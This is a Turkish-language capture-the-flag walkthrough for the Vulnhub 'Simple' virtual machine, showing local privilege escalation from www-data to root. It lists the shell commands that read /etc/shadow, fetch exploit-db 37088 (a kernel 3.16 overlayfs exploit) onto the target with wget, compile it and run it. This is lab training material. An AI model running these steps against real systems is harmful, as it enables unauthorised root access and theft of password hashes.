Yazıda kullanılan Simple CTF sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/
Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.
id
head -3 /etc/passwd
head -3 /etc/shadow
İşletim sisteminin sürüm bilgilerine bakıldığında Ubuntu 14.04.2 LTS kullanıldığı ve Linux çekirdek sürümü 3.16.0 olduğu görülmektedir.
uname -a
cat /etc/*release*
Linux Kernel 3.16.0’te kritik bir zafiyet bulunmaktadır. Bu zafiyeti istismar edecek kod exploit-db‘den indirilerek hedef sisteme aktarılacak ve çalıştırılacaktır.
https://www.exploit-db.com/exploits/37088/
Benzer olarak istismar kodu (ofs_32) Kernel-Exploits sitesinden de temin edilebilirdi.
https://www.kernel-exploits.com/
Veya, internetin olmadığı durumda ise Kali içerisindeki istismar kodu da kullanılabilirdi.
searchsploit 37088
ls -la /usr/share/exploitdb/platforms/linux/local/37088.c
Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.
ls
wget https://www.exploit-db.com/download/37088 –no-check-certificate -O IstismarKaynakKodu.c
ls -la
İstismar kodu derlenir.
gcc IstismarKaynakKodu.c -o HakYukseltme -static
ls -la
Sonrasında da zafiyetli sistemde çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.
./HakYukseltme
head -3 /etc/shadow
/bin/bash
id
Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:
- Acid: Server: https://www.vulnhub.com/entry/acid-server,125/
Kaynak:
SecTalks: BNE0x03 – Simple. Vulnhub’s VM Walkthrough